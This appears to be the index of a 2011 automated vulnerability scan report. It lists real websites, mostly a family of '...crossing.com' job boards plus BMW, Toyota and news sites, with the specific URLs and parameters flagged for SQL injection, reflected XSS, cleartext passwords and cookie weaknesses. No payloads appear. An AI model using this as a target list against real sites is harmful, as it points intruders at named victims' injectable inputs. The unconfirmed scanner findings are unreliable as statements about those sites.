Domain Names with "crossing" that have XSS

Sometimes the Crawlers find the oddest things......

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 12:01:25 CST 2011.

DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://www.edfed.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.lawcrossing.com/lcjssearchresults.php [REST URL parameter 1]

1.3. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [REST URL parameter 2]

1.4. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [name of an arbitrarily supplied request parameter]

1.5. http://www.legalauthority.com/signup.php [Referer HTTP header]

1.6. http://www.legalauthority.com/signup.php [name of an arbitrarily supplied request parameter]

1.7. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 1]

1.8. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 2]

1.9. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 3]

2. XPath injection

2.1. http://www.toyota.com/js/global/global.js [REST URL parameter 1]

2.2. http://www.toyota.com/js/global/global.js [REST URL parameter 2]

2.3. http://www.toyota.com/js/global/global.js [REST URL parameter 3]

3. Cross-site scripting (reflected)

3.1. http://www.100kcrossing.com/ [name of an arbitrarily supplied request parameter]

3.2. http://www.accountingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.3. http://www.accountmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

3.4. http://www.actuarialcrossing.com/ [name of an arbitrarily supplied request parameter]

3.5. http://www.admincrossing.com/ [name of an arbitrarily supplied request parameter]

3.6. http://www.advertisingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.7. http://www.aerospacecrossing.com/ [name of an arbitrarily supplied request parameter]

3.8. http://www.agriculturalcrossing.com/ [name of an arbitrarily supplied request parameter]

3.9. http://www.aharrisonbarnes.com/ [name of an arbitrarily supplied request parameter]

3.10. http://www.architecturecrossing.com/ [name of an arbitrarily supplied request parameter]

3.11. http://www.auditorcrossing.com/ [name of an arbitrarily supplied request parameter]

3.12. http://www.automotivecrossing.com/ [name of an arbitrarily supplied request parameter]

3.13. http://www.aviationcrossing.com/ [name of an arbitrarily supplied request parameter]

3.14. http://www.bcgsearch.com/searchresults.php [key parameter]

3.15. http://www.bcgsearch.com/searchresults.php [key parameter]

3.16. http://www.bcgsearch.com/searchresults.php [name of an arbitrarily supplied request parameter]

3.17. http://www.bilingualcrossing.com/ [name of an arbitrarily supplied request parameter]

3.18. http://www.biotechcrossing.com/ [name of an arbitrarily supplied request parameter]

3.19. http://www.bluecollarcrossing.com/ [name of an arbitrarily supplied request parameter]

3.20. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 2]

3.21. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 3]

3.22. http://www.businessanalystcrossing.com/ [name of an arbitrarily supplied request parameter]

3.23. http://www.businessdevelopmentcrossing.com/ [name of an arbitrarily supplied request parameter]

3.24. http://www.callcentercrossing.com/ [name of an arbitrarily supplied request parameter]

3.25. http://www.chefcrossing.com/ [name of an arbitrarily supplied request parameter]

3.26. http://www.civilengineeringcrossing.com/ [name of an arbitrarily supplied request parameter]

3.27. http://www.clevelcrossing.com/ [name of an arbitrarily supplied request parameter]

3.28. http://www.clinicalresearchcrossing.com/ [name of an arbitrarily supplied request parameter]

3.29. http://www.compliancecrossing.com/ [name of an arbitrarily supplied request parameter]

3.30. http://www.computeraideddesigncrossing.com/ [name of an arbitrarily supplied request parameter]

3.31. http://www.constructioncrossing.com/ [name of an arbitrarily supplied request parameter]

3.32. http://www.consultingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.33. http://www.contractmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

3.34. http://www.counselingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.35. http://www.cpluspluscrossing.com/ [name of an arbitrarily supplied request parameter]

3.36. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 1]

3.37. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 2]

3.38. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 3]

3.39. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 4]

3.40. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 1]

3.41. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 2]

3.42. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 3]

3.43. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 4]

3.44. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 5]

3.45. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 6]

3.46. http://www.customerservicecrossing.com/ [name of an arbitrarily supplied request parameter]

3.47. http://www.dbacrossing.com/ [name of an arbitrarily supplied request parameter]

3.48. http://www.dentalcrossing.com/ [name of an arbitrarily supplied request parameter]

3.49. http://www.designingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.50. http://www.diversitycrossing.com/ [name of an arbitrarily supplied request parameter]

3.51. http://www.dotnetcrossing.com/ [name of an arbitrarily supplied request parameter]

3.52. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

3.53. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

3.54. http://www.ecommercecrossing.com/ [name of an arbitrarily supplied request parameter]

3.55. http://www.editingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.56. http://www.educationcrossing.com/ [name of an arbitrarily supplied request parameter]

3.57. http://www.employmentcrossing.com/ [name of an arbitrarily supplied request parameter]

3.58. http://www.energycrossing.com/ [name of an arbitrarily supplied request parameter]

3.59. http://www.engineeringcrossing.com/ [name of an arbitrarily supplied request parameter]

3.60. http://www.entrylevelcrossing.com/ [name of an arbitrarily supplied request parameter]

3.61. http://www.environmentalcrossing.com/ [name of an arbitrarily supplied request parameter]

3.62. http://www.environmentalsafetyhealthcrossing.com/ [name of an arbitrarily supplied request parameter]

3.63. http://www.erpcrossing.com/ [name of an arbitrarily supplied request parameter]

3.64. http://www.execcrossing.com/ [name of an arbitrarily supplied request parameter]

3.65. http://www.facilitiescrossing.com/ [name of an arbitrarily supplied request parameter]

3.66. http://www.financialservicescrossing.com/ [name of an arbitrarily supplied request parameter]

3.67. http://www.foodservicescrossing.com/ [name of an arbitrarily supplied request parameter]

3.68. http://www.fundraisingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.69. http://www.giscrossing.com/ [name of an arbitrarily supplied request parameter]

3.70. http://www.governmentcrossing.com/ [name of an arbitrarily supplied request parameter]

3.71. http://www.healthcarecrossing.com/ [name of an arbitrarily supplied request parameter]

3.72. http://www.helpdeskcrossing.com/ [name of an arbitrarily supplied request parameter]

3.73. http://www.hospitalitycrossing.com/ [name of an arbitrarily supplied request parameter]

3.74. http://www.hrcrossing.com/ [name of an arbitrarily supplied request parameter]

3.75. http://www.hvaccrossing.com/ [name of an arbitrarily supplied request parameter]

3.76. http://www.informationtechnologycrossing.com/ [name of an arbitrarily supplied request parameter]

3.77. http://www.insurcrossing.com/ [name of an arbitrarily supplied request parameter]

3.78. http://www.intellectualpropertycrossing.com/ [name of an arbitrarily supplied request parameter]

3.79. http://www.internshipcrossing.com/ [name of an arbitrarily supplied request parameter]

3.80. http://www.j2eecrossing.com/ [name of an arbitrarily supplied request parameter]

3.81. http://www.journalismcrossing.com/ [name of an arbitrarily supplied request parameter]

3.82. http://www.lawcrossing.com/lcjssearchresults.php [name of an arbitrarily supplied request parameter]

3.83. http://www.logisticscrossing.com/ [name of an arbitrarily supplied request parameter]

3.84. http://www.managercrossing.com/ [name of an arbitrarily supplied request parameter]

3.85. http://www.manufacturingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.86. http://www.marketingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.87. http://www.mediajobcrossing.com/ [name of an arbitrarily supplied request parameter]

3.88. http://www.militarycrossing.com/ [name of an arbitrarily supplied request parameter]

3.89. http://www.nursingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.90. http://www.occupationaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]

3.91. http://www.operationscrossing.com/ [name of an arbitrarily supplied request parameter]

3.92. http://www.parttimecrossing.com/ [name of an arbitrarily supplied request parameter]

3.93. http://www.pharmaceuticalcrossing.com/ [name of an arbitrarily supplied request parameter]

3.94. http://www.physicalsecuritycrossing.com/ [name of an arbitrarily supplied request parameter]

3.95. http://www.physicaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]

3.96. http://www.planningcrossing.com/ [name of an arbitrarily supplied request parameter]

3.97. http://www.postdoctoralfellowcrossing.com/ [name of an arbitrarily supplied request parameter]

3.98. http://www.prcrossing.com/ [name of an arbitrarily supplied request parameter]

3.99. http://www.procurementcrossing.com/ [name of an arbitrarily supplied request parameter]

3.100. http://www.productmanagercrossing.com/ [name of an arbitrarily supplied request parameter]

3.101. http://www.projectmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

3.102. http://www.publicinterestcrossing.com/ [name of an arbitrarily supplied request parameter]

3.103. http://www.publishingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.104. http://www.purchasingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.105. http://www.qaqccrossing.com/ [name of an arbitrarily supplied request parameter]

3.106. http://www.radiocrossing.com/ [name of an arbitrarily supplied request parameter]

3.107. http://www.realestateandlandcrossing.com/ [name of an arbitrarily supplied request parameter]

3.108. http://www.recruitingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.109. http://www.researchingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.110. http://www.retailcrossing.com/ [name of an arbitrarily supplied request parameter]

3.111. http://www.sciencescrossing.com/ [name of an arbitrarily supplied request parameter]

3.112. http://www.scientistcrossing.com/ [name of an arbitrarily supplied request parameter]

3.113. http://www.sellingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.114. http://www.sqlcrossing.com/ [name of an arbitrarily supplied request parameter]

3.115. http://www.teenagercrossing.com/ [name of an arbitrarily supplied request parameter]

3.116. http://www.telecomcrossing.com/ [name of an arbitrarily supplied request parameter]

3.117. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 3]

3.118. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 4]

3.119. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 5]

3.120. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 6]

3.121. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 7]

3.122. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 8]

3.123. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

3.124. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

3.125. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

3.126. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]

3.127. http://www.tradingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.128. http://www.trainingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.129. http://www.transportationcrossing.com/ [name of an arbitrarily supplied request parameter]

3.130. http://www.travelingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.131. http://www.truckingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.132. http://www.tvcrossing.com/ [name of an arbitrarily supplied request parameter]

3.133. http://www.underwritingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.134. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [REST URL parameter 4]

3.135. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [companyId parameter]

3.136. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [name of an arbitrarily supplied request parameter]

3.137. http://www.velaw.com/offices/offices.aspx [ctl00%24txtboxSearch parameter]

3.138. http://www.velaw.com/search/search_result.aspx [searchtext parameter]

3.139. http://www.velaw.com/workarea/csslib/ektronCss.ashx [id parameter]

3.140. http://www.velaw.com/workarea/java/ektronJs.ashx [id parameter]

3.141. http://www.veterinarycrossing.com/ [name of an arbitrarily supplied request parameter]

3.142. http://www.volunteercrossing.com/ [name of an arbitrarily supplied request parameter]

3.143. http://www.workathomecrossing.com/ [name of an arbitrarily supplied request parameter]

3.144. http://www.writingcrossing.com/ [name of an arbitrarily supplied request parameter]

3.145. http://www.bcgsearch.com/searchresults.php [Referer HTTP header]

3.146. http://www.bmwusa.com/jsenvconst.ashx [User-Agent HTTP header]

3.147. http://www.employmentauthority.com/ [Referer HTTP header]

3.148. https://www.lawschoolloans.com/lslprivateloan_application.php [Referer HTTP header]

3.149. http://www.legalauthority.com/ [Referer HTTP header]

3.150. http://www.legalauthority.com/signup.php [Referer HTTP header]

3.151. http://www.legalauthority.com/tmlandingpage.php [Referer HTTP header]

3.152. http://www.toyota.com/mobility/index.html [REST URL parameter 1]

4. Flash cross-domain policy

4.1. http://www.huffingtonpost.com/crossdomain.xml

4.2. http://www.msnbc.msn.com/crossdomain.xml

4.3. http://www.nytimes.com/crossdomain.xml

4.4. http://www.politico.com/crossdomain.xml

4.5. http://www.usatoday.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://www.usatoday.com/clientaccesspolicy.xml

5.2. http://www.msnbc.msn.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://www.100kcrossing.com/

6.2. http://www.accountingcrossing.com/

6.3. http://www.accountmanagementcrossing.com/

6.4. http://www.actuarialcrossing.com/

6.5. http://www.admincrossing.com/

6.6. http://www.advertisingcrossing.com/

6.7. http://www.aerospacecrossing.com/

6.8. http://www.agriculturalcrossing.com/

6.9. http://www.architecturecrossing.com/

6.10. http://www.attorneyresume.com/

6.11. http://www.auditorcrossing.com/

6.12. http://www.automotivecrossing.com/

6.13. http://www.aviationcrossing.com/

6.14. http://www.bilingualcrossing.com/

6.15. http://www.biotechcrossing.com/

6.16. http://www.bluecollarcrossing.com/

6.17. http://www.businessanalystcrossing.com/

6.18. http://www.businessdevelopmentcrossing.com/

6.19. http://www.callcentercrossing.com/

6.20. http://www.chefcrossing.com/

6.21. http://www.civilengineeringcrossing.com/

6.22. http://www.clevelcrossing.com/

6.23. http://www.clinicalresearchcrossing.com/

6.24. http://www.compliancecrossing.com/

6.25. http://www.computeraideddesigncrossing.com/

6.26. http://www.constructioncrossing.com/

6.27. http://www.consultingcrossing.com/

6.28. http://www.contractmanagementcrossing.com/

6.29. http://www.counselingcrossing.com/

6.30. http://www.cpluspluscrossing.com/

6.31. http://www.customerservicecrossing.com/

6.32. http://www.dbacrossing.com/

6.33. http://www.dentalcrossing.com/

6.34. http://www.designingcrossing.com/

6.35. http://www.diversitycrossing.com/

6.36. http://www.dotnetcrossing.com/

6.37. http://www.ecommercecrossing.com/

6.38. http://www.editingcrossing.com/

6.39. http://www.educationcrossing.com/

6.40. http://www.employmentcrossing.com/

6.41. http://www.energycrossing.com/

6.42. http://www.engineeringcrossing.com/

6.43. http://www.entrylevelcrossing.com/

6.44. http://www.environmentalcrossing.com/

6.45. http://www.environmentalsafetyhealthcrossing.com/

6.46. http://www.ericmmartin.com/projects/simplemodal/

6.47. http://www.erpcrossing.com/

6.48. http://www.execcrossing.com/

6.49. http://www.facilitiescrossing.com/

6.50. http://www.financialservicescrossing.com/

6.51. http://www.foodservicescrossing.com/

6.52. http://www.fundraisingcrossing.com/

6.53. http://www.giscrossing.com/

6.54. http://www.governmentcrossing.com/

6.55. http://www.graduateschoolloans.com/

6.56. http://www.healthcarecrossing.com/

6.57. http://www.helpdeskcrossing.com/

6.58. http://www.hospitalitycrossing.com/

6.59. http://www.hrcrossing.com/

6.60. http://www.hvaccrossing.com/

6.61. http://www.informationtechnologycrossing.com/

6.62. http://www.insurcrossing.com/

6.63. http://www.intellectualpropertycrossing.com/

6.64. http://www.internshipcrossing.com/

6.65. http://www.j2eecrossing.com/

6.66. http://www.journalismcrossing.com/

6.67. http://www.lawcrossing.com/

6.68. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

6.69. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

6.70. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

6.71. http://www.lawcrossing.com/lcjssearchresults.php

6.72. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

6.73. http://www.lawschoolloans.com/

6.74. http://www.logisticscrossing.com/

6.75. http://www.managercrossing.com/

6.76. http://www.manufacturingcrossing.com/

6.77. http://www.marketingcrossing.com/

6.78. http://www.mediajobcrossing.com/

6.79. http://www.medicalschoolloans.com/

6.80. http://www.militarycrossing.com/

6.81. http://www.nursingcrossing.com/

6.82. http://www.occupationaltherapycrossing.com/

6.83. http://www.operationscrossing.com/

6.84. http://www.parttimecrossing.com/

6.85. http://www.pharmaceuticalcrossing.com/

6.86. http://www.physicalsecuritycrossing.com/

6.87. http://www.physicaltherapycrossing.com/

6.88. http://www.planningcrossing.com/

6.89. http://www.postdoctoralfellowcrossing.com/

6.90. http://www.prcrossing.com/

6.91. http://www.preferredresumes.com/

6.92. http://www.procurementcrossing.com/

6.93. http://www.productmanagercrossing.com/

6.94. http://www.projectmanagementcrossing.com/

6.95. http://www.publicinterestcrossing.com/

6.96. http://www.publishingcrossing.com/

6.97. http://www.purchasingcrossing.com/

6.98. http://www.qaqccrossing.com/

6.99. http://www.radiocrossing.com/

6.100. http://www.realestateandlandcrossing.com/

6.101. http://www.recruitingcrossing.com/

6.102. http://www.researchingcrossing.com/

6.103. http://www.resumeboomer.com/

6.104. http://www.retailcrossing.com/

6.105. http://www.sciencescrossing.com/

6.106. http://www.scientistcrossing.com/

6.107. http://www.sellingcrossing.com/

6.108. http://www.sqlcrossing.com/

6.109. http://www.teenagercrossing.com/

6.110. http://www.telecomcrossing.com/

6.111. http://www.toyota.com/owners/

6.112. http://www.tradingcrossing.com/

6.113. http://www.trainingcrossing.com/

6.114. http://www.transportationcrossing.com/

6.115. http://www.travelingcrossing.com/

6.116. http://www.truckingcrossing.com/

6.117. http://www.tvcrossing.com/

6.118. http://www.underwritingcrossing.com/

6.119. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

6.120. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

6.121. http://www.veterinarycrossing.com/

6.122. http://www.volunteercrossing.com/

6.123. http://www.woothemes.com/

6.124. http://www.workathomecrossing.com/

6.125. http://www.writingcrossing.com/

7. SSL cookie without secure flag set

7.1. https://www.bmwusa.com/Secured/FrameCheck.aspx

7.2. https://www.lawschoolloans.com/lslprivateloan_application.php

7.3. https://www.bmwusa.com/ScriptResource.axd

7.4. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

7.5. https://www.bmwusa.com/Secured/NaN

7.6. https://www.bmwusa.com/WebResource.axd

7.7. https://www.bmwusa.com/favicon.ico

7.8. https://www.bmwusa.com/jsenvconst.ashx

7.9. https://www.lowermybills.com/lending/home-refinance/

8. ASP.NET ViewState without MAC enabled

9. Cookie scoped to parent domain

9.1. http://www.directstartv.com/

9.2. http://www.edfed.com/

9.3. http://www.employmentauthority.com/

9.4. http://www.hound.com/

9.5. http://www.hound.com/gjsearchresult.php

9.6. http://www.lawcrossing.com/

9.7. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

9.8. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

9.9. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

9.10. http://www.lawcrossing.com/lcjssearchresults.php

9.11. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

9.12. http://www.legalauthority.com/

9.13. http://www.legalauthority.com/signup.php

9.14. http://www.opensource.org/licenses/gpl-license.php

9.15. http://www.opensource.org/licenses/mit-license.php

9.16. http://www.resumeboomer.com/

9.17. http://www.toyota.com/byt/pub/init.do

9.18. http://www.answers.com/topic/vinson-elkins-llp

9.19. http://www.buyatoyota.com/NationalLanding.aspx

9.20. http://www.facebook.com/BMWUSA

9.21. http://www.facebook.com/EmploymentXing

9.22. http://www.facebook.com/campaign/impression.php

9.23. http://www.facebook.com/campaign/landing.php

9.24. http://www.facebook.com/pages/JD2B/298408284363

9.25. http://www.facebook.com/piyush.v.bhatt

9.26. http://www.facebook.com/profile.php

9.27. http://www.facebook.com/yahoonews

10. Cookie without HttpOnly flag set

10.1. http://www.100kcrossing.com/

10.2. http://www.accountingcrossing.com/

10.3. http://www.accountmanagementcrossing.com/

10.4. http://www.actuarialcrossing.com/

10.5. http://www.admincrossing.com/

10.6. http://www.advertisingcrossing.com/

10.7. http://www.aerospacecrossing.com/

10.8. http://www.agriculturalcrossing.com/

10.9. http://www.aharrisonbarnes.com/

10.10. http://www.aharrisonbarnes.com/contact-us/script/functions.js

10.11. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

10.12. http://www.aharrisonbarnes.com/hb-course/

10.13. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/

10.14. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

10.15. http://www.answers.com/topic/vinson-elkins-llp

10.16. http://www.architecturecrossing.com/

10.17. http://www.attorneyresume.com/

10.18. http://www.auditorcrossing.com/

10.19. http://www.automotivecrossing.com/

10.20. http://www.aviationcrossing.com/

10.21. http://www.bcgsearch.com/

10.22. http://www.bcgsearch.com/browsejobs.php

10.23. http://www.bcgsearch.com/searchresults.php

10.24. http://www.bilingualcrossing.com/

10.25. http://www.biotechcrossing.com/

10.26. http://www.bluecollarcrossing.com/

10.27. http://www.businessanalystcrossing.com/

10.28. http://www.businessdevelopmentcrossing.com/

10.29. http://www.callcentercrossing.com/

10.30. http://www.chefcrossing.com/

10.31. http://www.civilengineeringcrossing.com/

10.32. http://www.clevelcrossing.com/

10.33. http://www.clinicalresearchcrossing.com/

10.34. http://www.compliancecrossing.com/

10.35. http://www.computeraideddesigncrossing.com/

10.36. http://www.constructioncrossing.com/

10.37. http://www.consultingcrossing.com/

10.38. http://www.contractmanagementcrossing.com/

10.39. http://www.counselingcrossing.com/

10.40. http://www.cpluspluscrossing.com/

10.41. http://www.customerservicecrossing.com/

10.42. http://www.dbacrossing.com/

10.43. http://www.dentalcrossing.com/

10.44. http://www.designingcrossing.com/

10.45. http://www.directstartv.com/

10.46. http://www.diversitycrossing.com/

10.47. http://www.dotnetcrossing.com/

10.48. http://www.ecommercecrossing.com/

10.49. http://www.edfed.com/

10.50. http://www.editingcrossing.com/

10.51. http://www.educationcrossing.com/

10.52. http://www.employmentauthority.com/

10.53. http://www.employmentcrossing.com/

10.54. http://www.energycrossing.com/

10.55. http://www.engineeringcrossing.com/

10.56. http://www.entrylevelcrossing.com/

10.57. http://www.environmentalcrossing.com/

10.58. http://www.environmentalsafetyhealthcrossing.com/

10.59. http://www.erpcrossing.com/

10.60. http://www.execcrossing.com/

10.61. http://www.facilitiescrossing.com/

10.62. http://www.financialservicescrossing.com/

10.63. http://www.foodservicescrossing.com/

10.64. http://www.fundraisingcrossing.com/

10.65. http://www.giscrossing.com/

10.66. http://www.governmentcrossing.com/

10.67. http://www.graduateschoolloans.com/

10.68. http://www.healthcarecrossing.com/

10.69. http://www.helpdeskcrossing.com/

10.70. http://www.hospitalitycrossing.com/

10.71. http://www.hound.com/

10.72. http://www.hound.com/gjsearchresult.php

10.73. http://www.hrcrossing.com/

10.74. http://www.hvaccrossing.com/

10.75. http://www.informationtechnologycrossing.com/

10.76. http://www.insurcrossing.com/

10.77. http://www.intellectualpropertycrossing.com/

10.78. http://www.internshipcrossing.com/

10.79. http://www.j2eecrossing.com/

10.80. http://www.journalismcrossing.com/

10.81. http://www.lawcrossing.com/

10.82. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

10.83. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

10.84. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

10.85. http://www.lawcrossing.com/lcjssearchresults.php

10.86. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

10.87. http://www.lawfirmstaff.com/

10.88. http://www.lawschoolloanreport.org/

10.89. http://www.lawschoolloans.com/

10.90. https://www.lawschoolloans.com/lslprivateloan_application.php

10.91. http://www.legalauthority.com/

10.92. http://www.legalauthority.com/signup.php

10.93. http://www.legalauthority.com/tmlandingpage.php

10.94. http://www.legalauthority.com/tmviewbanner.php

10.95. http://www.legalauthorityfinancial.com/

10.96. http://www.logisticscrossing.com/

10.97. http://www.managercrossing.com/

10.98. http://www.manufacturingcrossing.com/

10.99. http://www.marketingcrossing.com/

10.100. http://www.mediajobcrossing.com/

10.101. http://www.medicalschoolloans.com/

10.102. http://www.militarycrossing.com/

10.103. http://www.nursingcrossing.com/

10.104. http://www.occupationaltherapycrossing.com/

10.105. http://www.opensource.org/licenses/gpl-license.php

10.106. http://www.opensource.org/licenses/mit-license.php

10.107. http://www.operationscrossing.com/

10.108. http://www.parttimecrossing.com/

10.109. http://www.pharmaceuticalcrossing.com/

10.110. http://www.physicalsecuritycrossing.com/

10.111. http://www.physicaltherapycrossing.com/

10.112. http://www.planningcrossing.com/

10.113. http://www.postdoctoralfellowcrossing.com/

10.114. http://www.prcrossing.com/

10.115. http://www.preferredresumes.com/

10.116. http://www.procurementcrossing.com/

10.117. http://www.productmanagercrossing.com/

10.118. http://www.projectmanagementcrossing.com/

10.119. http://www.publicinterestcrossing.com/

10.120. http://www.publishingcrossing.com/

10.121. http://www.purchasingcrossing.com/

10.122. http://www.qaqccrossing.com/

10.123. http://www.radiocrossing.com/

10.124. http://www.realestateandlandcrossing.com/

10.125. http://www.recruitingcrossing.com/

10.126. http://www.researchingcrossing.com/

10.127. http://www.resumeboomer.com/

10.128. http://www.retailcrossing.com/

10.129. http://www.sciencescrossing.com/

10.130. http://www.scientistcrossing.com/

10.131. http://www.sellingcrossing.com/

10.132. http://www.sqlcrossing.com/

10.133. http://www.teenagercrossing.com/

10.134. http://www.telecomcrossing.com/

10.135. http://www.toyota.com/byt/pub/init.do

10.136. http://www.toyota.com/owners/apps/maintenance-guides.do

10.137. http://www.toyota.com/owners/apps/manuals.do

10.138. http://www.tradingcrossing.com/

10.139. http://www.trainingcrossing.com/

10.140. http://www.transportationcrossing.com/

10.141. http://www.travelingcrossing.com/

10.142. http://www.truckingcrossing.com/

10.143. http://www.tvcrossing.com/

10.144. http://www.underwritingcrossing.com/

10.145. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

10.146. http://www.veterinarycrossing.com/

10.147. http://www.volunteercrossing.com/

10.148. http://www.workathomecrossing.com/

10.149. http://www.writingcrossing.com/

10.150. http://www.bmwusa.com/

10.151. http://www.bmwusa.com/

10.152. http://www.bmwusa.com/Error_Cookieless.aspx

10.153. http://www.bmwusa.com/ScriptResource.axd

10.154. http://www.bmwusa.com/WebResource.axd

10.155. http://www.bmwusa.com/default.aspx

10.156. http://www.bmwusa.com/favicon.ico

10.157. http://www.bmwusa.com/jsenvconst.ashx

10.158. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx

10.159. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx

10.160. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx

10.161. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx

10.162. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx

10.163. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx

10.164. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx

10.165. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx

10.166. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx

10.167. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx

10.168. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx

10.169. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx

10.170. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx

10.171. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx

10.172. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/features_and_specs/default.aspx

